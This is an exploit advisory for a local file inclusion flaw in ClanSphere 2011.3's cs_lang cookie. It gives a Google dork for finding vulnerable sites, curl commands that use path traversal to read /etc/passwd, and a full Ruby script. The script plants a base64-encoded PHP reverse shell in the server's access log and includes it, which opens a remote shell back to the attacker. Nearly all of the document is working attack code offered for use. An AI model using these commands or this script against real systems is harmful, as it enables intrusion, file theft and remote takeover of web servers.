Exploit Title: ClanSphere 2011.3 (cs_lang cookie parameter) Local File Include Vulnerability Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere Date: 10/22/2012 Author: Marco Tulio ~> blkhtc0rp Vendor Homepage: http://www.csphere.eu Version: 2011.3 Tested on: Centos 5.7, Ubuntu 8.04 and FreeBSD 8 Poc: curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00.png" curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd" curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00" Exploit: #!/usr/bin/ruby # # ClanSphere 2011.3 (cs_lang) LFI exploit by blkhtc0rp # # # ./clanSphere.rb "http://server/apps/clansphere_2011.3/" "/var/log/httpd/access_log" 192.168.1.221 12345 # [x] ClanSphere 2011.3 LFI Exploit # [x] Author: blkhtc0rp # [x] Reverse shell on 192.168.1.221:12345 # # # nc -lp 12345 # pwd # /var/www/html/apps/clansphere_2011.3 # id # uid=48(apache) gid=48(apache) groups=48(apache) # require 'net/http' require 'base64' host = ARGV[0] log = ARGV[1] ip = ARGV[2] rev_port = ARGV[3] abort("Usage: #{$0} <url> <log> <your_ip> <port>") unless ARGV.size == 4 uri = URI.parse(host) cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../.." + log + "%00.png" headers = { 'Cookie' => cookie, 'User-Agent' => 'Mozilla/4.0 (PSP (PlayStation Portable); 5.03)' } # Tiny shell from the net lol. shell = "\$ip = \'#{ip}\';\$port = #{rev_port}; if (!(\$sock=fsockopen(\$ip,\$port))) die; while(!feof(\$sock)){ \$command = fgets(\$sock);\$pipe = popen(\$command,'r'); while (!feof(\$pipe)) fwrite (\$sock, fgets(\$pipe)); pclose(\$pipe);}fclose(\$sock);" enc = Base64.encode64(shell).gsub("\n",'') sh_encoded = "<?php eval(base64_decode(#{enc}));?>" puts "[x] ClanSphere 2011.3 LFI Exploit" puts "[x] Author: blkhtc0rp" puts "[x] Reverse shell on #{ip}:#{rev_port}" # Inject base64 shell req = Net::HTTP::Get.new(sh_encoded) status = Net::HTTP.new(uri.host, uri.port).start do |http| http.request(req) end # Exec shell req2 = Net::HTTP::Get.new(uri.path, headers) status = Net::HTTP.new(uri.host, uri.port).start do |http| http.request(req2) endБрой прочитания на тази страница: 34640
ClanSphere 2011.3 (cs_lang cookie parameter) Local File Inclusion